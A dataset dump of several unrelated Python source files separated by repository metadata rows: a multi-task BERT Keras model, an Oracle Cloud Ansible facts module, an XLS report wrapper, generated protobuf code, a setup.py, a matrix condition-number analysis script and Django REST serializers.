if self.params.grid_transformer:
raise NotImplementedError
return_hidden_feature[problem] = hidden_feature_this_round
return_feature[problem] = feature_this_round
return return_feature, return_hidden_feature
# Cell
class BertMultiTaskTop(tf.keras.Model):
"""Model to create top layer, aka classification layer, for each problem.
"""
def __init__(self, params: BaseParams, name='BertMultiTaskTop', input_embeddings: tf.Tensor = None):
super(BertMultiTaskTop, self).__init__(name=name)
self.params = params
problem_type_layer = {
'seq_tag': SequenceLabel,
'cls': Classification,
'seq2seq_tag': Seq2Seq,
'seq2seq_text': Seq2Seq,
'multi_cls': MultiLabelClassification,
'pretrain': PreTrain,
'masklm': MaskLM
}
problem_type_layer.update(self.params.top_layer)
self.top_layer_dict = {}
for problem_dict in self.params.run_problem_list:
for problem in problem_dict:
problem_type = self.params.problem_type[problem]
# some layers has different signatures, assign inputs accordingly
layer_signature_name = signature(
problem_type_layer[problem_type].__init__).parameters.keys()
inputs_kwargs = {
'params': self.params,
'problem_name': problem
}
for signature_name in layer_signature_name:
if signature_name == 'input_embeddings':
inputs_kwargs.update(
{signature_name: input_embeddings})
self.top_layer_dict[problem] = problem_type_layer[problem_type](
**inputs_kwargs)
def call(self,
inputs: Tuple[Dict[str, Dict[str, tf.Tensor]], Dict[str, Dict[str, tf.Tensor]]],
mode: str) -> Dict[str, tf.Tensor]:
features, hidden_feature = inputs
return_dict = {}
for problem_dict in self.params.run_problem_list:
for problem in problem_dict:
feature_this_round = features[problem]
hidden_feature_this_round = hidden_feature[problem]
problem_type = self.params.problem_type[problem]
# if pretrain, return pretrain logit
if problem_type == 'pretrain':
pretrain = self.top_layer_dict[problem]
return_dict[problem] = pretrain(
(feature_this_round, hidden_feature_this_round), mode)
return return_dict
if self.params.label_transfer and self.params.grid_transformer:
raise ValueError(
'Label Transfer and grid transformer cannot be enabled in the same time.'
)
with tf.name_scope(problem):
layer = self.top_layer_dict[problem]
return_dict[problem] = layer(
(feature_this_round, hidden_feature_this_round), mode)
if self.params.augument_mask_lm and mode == tf.estimator.ModeKeys.TRAIN:
raise NotImplementedError
# try:
# mask_lm_top = MaskLM(self.params)
# return_dict['augument_mask_lm'] = \
# mask_lm_top(features,
# hidden_feature, mode, 'dummy')
# except ValueError:
# pass
return return_dict
# Cell
class BertMultiTask(tf.keras.Model):
def __init__(self, params: BaseParams, name='BertMultiTask') -> None:
super(BertMultiTask, self).__init__(name=name)
self.params = params
# initialize body model, aka transformers
self.body = BertMultiTaskBody(params=self.params)
# mlm might need word embedding from bert
# build sub-model
_ = get_embedding_table_from_model(self.body.bert.bert_model)
main_model = get_transformer_main_model(self.body.bert.bert_model)
# input_embeddings = self.body.bert.bert_model.bert.embeddings
input_embeddings = main_model.embeddings
self.top = BertMultiTaskTop(
params=self.params, input_embeddings=input_embeddings)
def call(self, inputs, mode=tf.estimator.ModeKeys.TRAIN):
feature_per_problem, hidden_feature_per_problem = self.body(
inputs, mode)
pred_per_problem = self.top(
(feature_per_problem, hidden_feature_per_problem), mode)
return pred_per_problem
def compile(self):
super(BertMultiTask, self).compile()
logger = tf.get_logger()
logger.info('Initial lr: {}'.format(self.params.lr))
logger.info('Train steps: {}'.format(self.params.train_steps))
logger.info('Warmup steps: {}'.format(self.params.num_warmup_steps))
self.optimizer, self.lr_scheduler = transformers.optimization_tf.create_optimizer(
init_lr=self.params.lr,
num_train_steps=self.params.train_steps,
num_warmup_steps=self.params.num_warmup_steps,
weight_decay_rate=0.01
)
self.mean_acc = tf.keras.metrics.Mean(name='mean_acc')
def train_step(self, data):
with tf.GradientTape() as tape:
# Forward pass
_ = self(data, mode=tf.estimator.ModeKeys.TRAIN)
# gather losses from all problems
loss_dict = {'{}_loss'.format(problem_name): tf.reduce_sum(top_layer.losses) for problem_name,
top_layer in self.top.top_layer_dict.items()}
# metric_dict = {'{}_metric'.format(problem_name): tf.reduce_mean(top_layer.metrics) for problem_name,
# top_layer in self.top.top_layer_dict.items()}
metric_dict = {m.name: m.result() for m in self.metrics}
# Compute gradients
trainable_vars = self.trainable_variables
gradients = tape.gradient(self.losses, trainable_vars)
# Update weights
self.optimizer.apply_gradients(zip(gradients, trainable_vars))
self.mean_acc.update_state(
[v for n, v in metric_dict.items() if n != 'mean_acc'])
return_dict = metric_dict
return_dict.update(loss_dict)
return_dict[self.mean_acc.name] = self.mean_acc.result()
# Return a dict mapping metric names to current value.
# Note that it will include the loss (tracked in self.metrics).
return return_dict
def test_step(self, data):
"""The logic for one evaluation step.
This method can be overridden to support custom evaluation logic.
This method is called by `Model.make_test_function`.
This function should contain the mathemetical logic for one step of
evaluation.
This typically includes the forward pass, loss calculation, and metrics
updates.
Configuration details for *how* this logic is run (e.g. `tf.function` and
`tf.distribute.Strategy` settings), should be left to
`Model.make_test_function`, which can also be overridden.
Arguments:
data: A nested structure of `Tensor`s.
Returns:
A `dict` containing values that will be passed to
`tf.keras.callbacks.CallbackList.on_train_batch_end`. Typically, the
values of the `Model`'s metrics are returned.
"""
y_pred = self(data, mode=tf.estimator.ModeKeys.EVAL)
# Updates stateful loss metrics.
self.compiled_loss(
None, y_pred, None, regularization_losses=self.losses)
self.compiled_metrics.update_state(None, y_pred, None)
# get metrics to calculate mean
m_list = []
for metric in self.metrics:
if 'mean_acc' in metric.name:
continue
if 'acc' in metric.name:
m_list.append(metric.result())
if 'f1' in metric.name:
m_list.append(metric.result())
self.mean_acc.update_state(
m_list)
return {m.name: m.result() for m in self.metrics}
def predict_step(self, data):
return self(data, mode=tf.estimator.ModeKeys.PREDICT)
| 42.368564 | 114 | 0.623321 | 1,840 | 15,634 | 5.036957 | 0.176087 | 0.064523 | 0.03798 | 0.028485 | 0.445619 | 0.34959 | 0.289167 | 0.233492 | 0.181916 | 0.171019 | 0 | 0.005824 | 0.286107 | 15,634 | 368 | 115 | 42.483696 | 0.824568 | 0.216579 | 0 | 0.162162 | 1 | 0 | 0.051026 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058559 | false | 0 | 0.036036 | 0.004505 | 0.148649 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e6885b17b97915311f8a8bd86b9f72a31641ef6d | 7,392 | py | Python | plugins/modules/oci_database_management_object_privilege_facts.py | LaudateCorpus1/oci-ansible-collection | 2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7 | [
"Apache-2.0"
] | null | null | null | plugins/modules/oci_database_management_object_privilege_facts.py | LaudateCorpus1/oci-ansible-collection | 2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7 | [
"Apache-2.0"
] | null | null | null | plugins/modules/oci_database_management_object_privilege_facts.py | LaudateCorpus1/oci-ansible-collection | 2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# Copyright (c) 2020, 2022 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_database_management_object_privilege_facts
short_description: Fetches details about one or multiple ObjectPrivilege resources in Oracle Cloud Infrastructure
description:
- Fetches details about one or multiple ObjectPrivilege resources in Oracle Cloud Infrastructure
- Gets the list of Object Privileges granted for the specified user.
version_added: "2.9.0"
author: Oracle (@oracle)
options:
managed_database_id:
description:
- The L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the Managed Database.
type: str
required: true
user_name:
description:
- The name of the user whose details are to be viewed.
type: str
required: true
name:
description:
- A filter to return only resources that match the entire name.
type: str
sort_by:
description:
- The field to sort information by. Only one sortOrder can be used. The default sort order
for 'NAME' is ascending. The 'NAME' sort order is case-sensitive.
type: str
choices:
- "NAME"
sort_order:
description:
- The option to sort information in ascending ('ASC') or descending ('DESC') order. Ascending order is the default order.
type: str
choices:
- "ASC"
- "DESC"
extends_documentation_fragment: [ oracle.oci.oracle ]
"""
EXAMPLES = """
- name: List object_privileges
oci_database_management_object_privilege_facts:
# required
managed_database_id: "ocid1.manageddatabase.oc1..xxxxxxEXAMPLExxxxxx"
user_name: user_name_example
# optional
name: name_example
sort_by: NAME
sort_order: ASC
"""
RETURN = """
object_privileges:
description:
- List of ObjectPrivilege resources
returned: on success
type: complex
contains:
name:
description:
- The name of the privilege on the object.
returned: on success
type: str
sample: name_example
schema_type:
description:
- The type of the object.
returned: on success
type: str
sample: schema_type_example
owner:
description:
- The owner of the object.
returned: on success
type: str
sample: owner_example
grantor:
description:
- The name of the user who performed the grant
returned: on success
type: str
sample: grantor_example
hierarchy:
description:
- Indicates whether the privilege was granted with the HIERARCHY OPTION (YES) or not (NO)
returned: on success
type: str
sample: YES
object:
description:
- The name of the object. The object can be any object, including tables, packages, indexes, sequences, and so on.
returned: on success
type: str
sample: object_example
grant_option:
description:
- Indicates whether the privilege was granted with the GRANT OPTION (YES) or not (NO)
returned: on success
type: str
sample: YES
common:
description:
- "Indicates how the grant was made. Possible values:
YES if the role was granted commonly (CONTAINER=ALL was used)
NO if the role was granted locally (CONTAINER=ALL was not used)"
returned: on success
type: str
sample: YES
inherited:
description:
- Indicates whether the role grant was inherited from another container (YES) or not (NO)
returned: on success
type: str
sample: YES
sample: [{
"name": "name_example",
"schema_type": "schema_type_example",
"owner": "owner_example",
"grantor": "grantor_example",
"hierarchy": "YES",
"object": "object_example",
"grant_option": "YES",
"common": "YES",
"inherited": "YES"
}]
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceFactsHelperBase,
get_custom_class,
)
try:
from oci.database_management import DbManagementClient
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class ObjectPrivilegeFactsHelperGen(OCIResourceFactsHelperBase):
"""Supported operations: list"""
def get_required_params_for_list(self):
return [
"managed_database_id",
"user_name",
]
def list_resources(self):
optional_list_method_params = [
"name",
"sort_by",
"sort_order",
]
optional_kwargs = dict(
(param, self.module.params[param])
for param in optional_list_method_params
if self.module.params.get(param) is not None
)
return oci_common_utils.list_all_resources(
self.client.list_object_privileges,
managed_database_id=self.module.params.get("managed_database_id"),
user_name=self.module.params.get("user_name"),
**optional_kwargs
)
ObjectPrivilegeFactsHelperCustom = get_custom_class("ObjectPrivilegeFactsHelperCustom")
class ResourceFactsHelper(
ObjectPrivilegeFactsHelperCustom, ObjectPrivilegeFactsHelperGen
):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec()
module_args.update(
dict(
managed_database_id=dict(type="str", required=True),
user_name=dict(type="str", required=True),
name=dict(type="str"),
sort_by=dict(type="str", choices=["NAME"]),
sort_order=dict(type="str", choices=["ASC", "DESC"]),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_facts_helper = ResourceFactsHelper(
module=module,
resource_type="object_privilege",
service_client_class=DbManagementClient,
namespace="database_management",
)
result = []
if resource_facts_helper.is_list():
result = resource_facts_helper.list()
else:
resource_facts_helper.fail()
module.exit_json(object_privileges=result)
if __name__ == "__main__":
main()
| 30.92887 | 133 | 0.626759 | 822 | 7,392 | 5.453771 | 0.284672 | 0.029668 | 0.037921 | 0.046844 | 0.274593 | 0.228418 | 0.154584 | 0.147223 | 0.116663 | 0.073388 | 0 | 0.004805 | 0.296131 | 7,392 | 238 | 134 | 31.058824 | 0.856813 | 0.05533 | 0 | 0.265 | 0 | 0.015 | 0.648114 | 0.03242 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015 | false | 0.005 | 0.03 | 0.005 | 0.065 | 0.005 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e68c436db086a9f75f4ec9a1c59f8bdd8afa7f45 | 1,028 | py | Python | src/simple_report/xls/document.py | glibin/simple-report | 1e68b2fe568d6f7a7d9332d0e83b9a21661419e0 | [
"Apache-2.0"
] | null | null | null | src/simple_report/xls/document.py | glibin/simple-report | 1e68b2fe568d6f7a7d9332d0e83b9a21661419e0 | [
"Apache-2.0"
] | null | null | null | src/simple_report/xls/document.py | glibin/simple-report | 1e68b2fe568d6f7a7d9332d0e83b9a21661419e0 | [
"Apache-2.0"
] | null | null | null | #coding: utf-8
import xlrd
from simple_report.core.document_wrap import BaseDocument, SpreadsheetDocument
from simple_report.xls.workbook import Workbook
from simple_report.xls.output_options import XSL_OUTPUT_SETTINGS
class DocumentXLS(BaseDocument, SpreadsheetDocument):
"""
Обертка для отчетов в формате XLS
"""
def __init__(self, ffile, tags=None, **kwargs):
self.file = ffile
self._workbook = Workbook(ffile, **kwargs)
@property
def workbook(self):
"""
Получение рабочей книги
:result: рабочая книга
"""
return self._workbook
def build(self, dst):
"""
Сборка отчета
:param dst: путь до выходного файла
:result:
"""
self._workbook.build(dst)
def __setattr__(self, key, value):
if key in XSL_OUTPUT_SETTINGS:
setattr(self._workbook, key, value)
else:
super(DocumentXLS, self).__setattr__(key, value)
| 25.7 | 79 | 0.614786 | 109 | 1,028 | 5.568807 | 0.53211 | 0.079077 | 0.079077 | 0.062603 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001389 | 0.299611 | 1,028 | 39 | 80 | 26.358974 | 0.841667 | 0.150778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.222222 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e68c634de73f166e370b403383fc377943dc8b21 | 4,796 | py | Python | pipeline_sdk/api/build/cancel_build_pb2.py | easyopsapis/easyops-api-python | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | [
"Apache-2.0"
] | 5 | 2019-07-31T04:11:05.000Z | 2021-01-07T03:23:20.000Z | pipeline_sdk/api/build/cancel_build_pb2.py | easyopsapis/easyops-api-python | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | [
"Apache-2.0"
] | null | null | null | pipeline_sdk/api/build/cancel_build_pb2.py | easyopsapis/easyops-api-python | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: cancel_build.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='cancel_build.proto',
package='build',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x12\x63\x61ncel_build.proto\x12\x05\x62uild\x1a\x1bgoogle/protobuf/empty.proto\"!\n\rCancelRequest\x12\x10\n\x08\x62uild_id\x18\x01 \x01(\t\"o\n\x15\x43\x61ncelResponseWrapper\x12\x0c\n\x04\x63ode\x18\x01 \x01(\x05\x12\x13\n\x0b\x63odeExplain\x18\x02 \x01(\t\x12\r\n\x05\x65rror\x18\x03 \x01(\t\x12$\n\x04\x64\x61ta\x18\x04 \x01(\x0b\x32\x16.google.protobuf.Emptyb\x06proto3')
,
dependencies=[google_dot_protobuf_dot_empty__pb2.DESCRIPTOR,])
_CANCELREQUEST = _descriptor.Descriptor(
name='CancelRequest',
full_name='build.CancelRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='build_id', full_name='build.CancelRequest.build_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=58,
serialized_end=91,
)
_CANCELRESPONSEWRAPPER = _descriptor.Descriptor(
name='CancelResponseWrapper',
full_name='build.CancelResponseWrapper',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='build.CancelResponseWrapper.code', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='codeExplain', full_name='build.CancelResponseWrapper.codeExplain', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='error', full_name='build.CancelResponseWrapper.error', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='data', full_name='build.CancelResponseWrapper.data', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=93,
serialized_end=204,
)
_CANCELRESPONSEWRAPPER.fields_by_name['data'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
DESCRIPTOR.message_types_by_name['CancelRequest'] = _CANCELREQUEST
DESCRIPTOR.message_types_by_name['CancelResponseWrapper'] = _CANCELRESPONSEWRAPPER
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
CancelRequest = _reflection.GeneratedProtocolMessageType('CancelRequest', (_message.Message,), {
'DESCRIPTOR' : _CANCELREQUEST,
'__module__' : 'cancel_build_pb2'
# @@protoc_insertion_point(class_scope:build.CancelRequest)
})
_sym_db.RegisterMessage(CancelRequest)
CancelResponseWrapper = _reflection.GeneratedProtocolMessageType('CancelResponseWrapper', (_message.Message,), {
'DESCRIPTOR' : _CANCELRESPONSEWRAPPER,
'__module__' : 'cancel_build_pb2'
# @@protoc_insertion_point(class_scope:build.CancelResponseWrapper)
})
_sym_db.RegisterMessage(CancelResponseWrapper)
# @@protoc_insertion_point(module_scope)
| 35.791045 | 399 | 0.755004 | 591 | 4,796 | 5.832487 | 0.240271 | 0.039455 | 0.048738 | 0.034813 | 0.466783 | 0.441833 | 0.43371 | 0.411662 | 0.389614 | 0.389614 | 0 | 0.035342 | 0.120934 | 4,796 | 133 | 400 | 36.06015 | 0.782258 | 0.062969 | 0 | 0.559633 | 1 | 0.009174 | 0.191485 | 0.139545 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.055046 | 0 | 0.055046 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e692cff5589dc59f4785c76fbfa11c53ff5a1d4e | 305 | py | Python | setup.py | arokem/afq-deep-learning | 61d7746f03914d63c56253d10d0f6a21e6c78e90 | [
"BSD-3-Clause"
] | null | null | null | setup.py | arokem/afq-deep-learning | 61d7746f03914d63c56253d10d0f6a21e6c78e90 | [
"BSD-3-Clause"
] | null | null | null | setup.py | arokem/afq-deep-learning | 61d7746f03914d63c56253d10d0f6a21e6c78e90 | [
"BSD-3-Clause"
] | 2 | 2021-12-01T17:04:39.000Z | 2022-01-20T22:53:40.000Z | from setuptools import find_packages, setup
setup(
name='src',
packages=find_packages(),
version='0.1.0',
description='This repository hosts some work-in-progress experiments applying deep learning to predict age using tractometry data.',
author='Joanna Qiao',
license='BSD-3',
)
| 27.727273 | 136 | 0.718033 | 40 | 305 | 5.425 | 0.875 | 0.110599 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015873 | 0.17377 | 305 | 10 | 137 | 30.5 | 0.845238 | 0 | 0 | 0 | 0 | 0 | 0.462295 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e6957e411e3b025a67a76d0f0a74f5d86329bb6f | 2,683 | py | Python | analytical/conditionnumber.py | gyyang/olfaction_evolution | 434baa85b91f450e1ab63c6b9eafb8d370f1df96 | [
"MIT"
] | 9 | 2021-10-11T01:16:23.000Z | 2022-01-13T14:07:08.000Z | analytical/conditionnumber.py | gyyang/olfaction_evolution | 434baa85b91f450e1ab63c6b9eafb8d370f1df96 | [
"MIT"
] | 1 | 2021-10-30T09:49:08.000Z | 2021-10-30T09:49:08.000Z | analytical/conditionnumber.py | gyyang/olfaction_evolution | 434baa85b91f450e1ab63c6b9eafb8d370f1df96 | [
"MIT"
] | null | null | null | """Analyze condition number of the network."""
import numpy as np
import matplotlib.pyplot as plt
# import model
def _get_sparse_mask(nx, ny, non, complex=False, nOR=50):
"""Generate a binary mask.
The mask will be of size (nx, ny)
For all the nx connections to each 1 of the ny units, only non connections are 1.
Args:
nx: int
ny: int
non: int, must not be larger than nx
Return:
mask: numpy array (nx, ny)
"""
mask = np.zeros((nx, ny))
if not complex:
mask[:non] = 1
for i in range(ny):
np.random.shuffle(mask[:, i]) # shuffling in-place
return mask.astype(np.float32)
def _get_cond(q, n_orn, n_pn, n_kc, n_kc_claw):
M = np.random.rand(n_orn, n_pn)
M_new = M * (1-q) + np.eye(n_orn) * q
# J = np.random.rand(N_PN, N_KC) / np.sqrt(N_PN + N_KC)
# J = np.random.randn(N_PN, N_KC) / np.sqrt(N_PN + N_KC)
J = np.random.rand(n_pn, n_kc)
mask = _get_sparse_mask(n_pn, n_kc, n_kc_claw) / n_kc_claw
J = J * mask
K = np.dot(M_new, J)
# cond = np.linalg.cond(K)
cond = np.linalg.norm(np.linalg.pinv(K)) * np.linalg.norm(K)
return cond
def get_logcond(q=1, n_orn=50, n_pn=50, n_kc=2500, n_kc_claw=7, n_rep=10):
conds = [_get_cond(q, n_orn, n_pn, n_kc, n_kc_claw) for i in range(n_rep)]
return np.mean(np.log10(conds))
def plot_cond_by_q(n_kc=2500):
qs = np.linspace(0, 1, 100)
conds = [get_logcond(q=q, n_kc=n_kc) for q in qs]
plt.figure()
plt.plot(qs, conds, 'o-')
plt.title('N_KC: ' + str(n_kc))
plt.xlabel('fraction diagonal')
plt.ylabel('log condition number')
# plt.savefig('figures/condvsfracdiag_nkc'+str(n_kc)+'.pdf', transparent=True)
def plot_cond_by_n_kc():
n_kcs = np.logspace(1, 4, 10).astype(int)
conds_q1 = np.array([get_logcond(n_kc=n_kc, q=1) for n_kc in n_kcs])
plt.figure()
plt.plot(np.log10(n_kcs), conds_q1, 'o-')
plt.xticks(np.log10(n_kcs), n_kcs)
plt.xlabel('N_KC')
n_kcs = np.logspace(1, 4, 10).astype(int)
conds_q0 = np.array([get_logcond(n_kc=n_kc, q=0) for n_kc in n_kcs])
plt.figure()
plt.plot(np.log10(n_kcs), conds_q0, 'o-')
plt.xticks(np.log10(n_kcs), n_kcs)
plt.xlabel('N_KC')
plt.figure()
plt.plot(np.log10(n_kcs), conds_q1 - conds_q0, 'o-')
plt.xticks(np.log10(n_kcs), n_kcs)
plt.ylabel('Log decrease in condition number')
plt.xlabel('N_KC')
n_kc_claws = np.arange(1, 50)
conds = np.array([get_logcond(n_kc_claw=n) for n in n_kc_claws])
plt.figure()
plt.plot(n_kc_claws, conds, 'o-')
plt.xticks(n_kc_claws)
plt.xlabel('N_KC_claw')
plt.show()
| 27.10101 | 85 | 0.621319 | 502 | 2,683 | 3.10757 | 0.23506 | 0.069231 | 0.023077 | 0.030769 | 0.335256 | 0.326923 | 0.314103 | 0.305769 | 0.291026 | 0.260256 | 0 | 0.029808 | 0.224748 | 2,683 | 98 | 86 | 27.377551 | 0.720192 | 0.200149 | 0 | 0.240741 | 1 | 0 | 0.050645 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.092593 | false | 0 | 0.037037 | 0 | 0.185185 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e6960adb05d4b964e50fe6cceef1e01091d1811d | 2,327 | py | Python | FusionIIIT/applications/placement_cell/api/serializers.py | 29rj/Fusion | bc2941a67532e183adeb0bc4042df0b182b9e3aa | [
"bzip2-1.0.6"
] | 29 | 2019-02-20T15:35:33.000Z | 2022-03-22T11:10:57.000Z | FusionIIIT/applications/placement_cell/api/serializers.py | 29rj/Fusion | bc2941a67532e183adeb0bc4042df0b182b9e3aa | [
"bzip2-1.0.6"
] | 409 | 2019-01-17T19:30:51.000Z | 2022-03-31T16:28:45.000Z | FusionIIIT/applications/placement_cell/api/serializers.py | 29rj/Fusion | bc2941a67532e183adeb0bc4042df0b182b9e3aa | [
"bzip2-1.0.6"
] | 456 | 2019-01-12T11:01:13.000Z | 2022-03-30T17:06:52.000Z | from rest_framework.authtoken.models import Token
from rest_framework import serializers
from applications.placement_cell.models import (Achievement, Course, Education,
Experience, Has, Patent,
Project, Publication, Skill,
PlacementStatus, NotifyStudent)
class SkillSerializer(serializers.ModelSerializer):
class Meta:
model = Skill
fields = ('__all__')
class HasSerializer(serializers.ModelSerializer):
skill_id = SkillSerializer()
class Meta:
model = Has
fields = ('skill_id','skill_rating')
def create(self, validated_data):
skill = validated_data.pop('skill_id')
skill_id, created = Skill.objects.get_or_create(**skill)
try:
has_obj = Has.objects.create(skill_id=skill_id,**validated_data)
except:
raise serializers.ValidationError({'skill': 'This skill is already present'})
return has_obj
class EducationSerializer(serializers.ModelSerializer):
class Meta:
model = Education
fields = ('__all__')
class CourseSerializer(serializers.ModelSerializer):
class Meta:
model = Course
fields = ('__all__')
class ExperienceSerializer(serializers.ModelSerializer):
class Meta:
model = Experience
fields = ('__all__')
class ProjectSerializer(serializers.ModelSerializer):
class Meta:
model = Project
fields = ('__all__')
class AchievementSerializer(serializers.ModelSerializer):
class Meta:
model = Achievement
fields = ('__all__')
class PublicationSerializer(serializers.ModelSerializer):
class Meta:
model = Publication
fields = ('__all__')
class PatentSerializer(serializers.ModelSerializer):
class Meta:
model = Patent
fields = ('__all__')
class NotifyStudentSerializer(serializers.ModelSerializer):
class Meta:
model = NotifyStudent
fields = ('__all__')
class PlacementStatusSerializer(serializers.ModelSerializer):
notify_id = NotifyStudentSerializer()
class Meta:
model = PlacementStatus
fields = ('notify_id', 'invitation', 'placed', 'timestamp', 'no_of_days')
| 27.376471 | 89 | 0.644607 | 200 | 2,327 | 7.215 | 0.34 | 0.198198 | 0.106722 | 0.218295 | 0.24948 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.270735 | 2,327 | 84 | 90 | 27.702381 | 0.850324 | 0 | 0 | 0.333333 | 0 | 0 | 0.072626 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016667 | false | 0 | 0.05 | 0 | 0.483333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e69960fc13118fa865fc6b90dfac61ac3e974383 | 1,290 | py | Python | model-optimizer/extensions/front/mxnet/arange_ext.py | calvinfeng/openvino | 11f591c16852637506b1b40d083b450e56d0c8ac | [
"Apache-2.0"
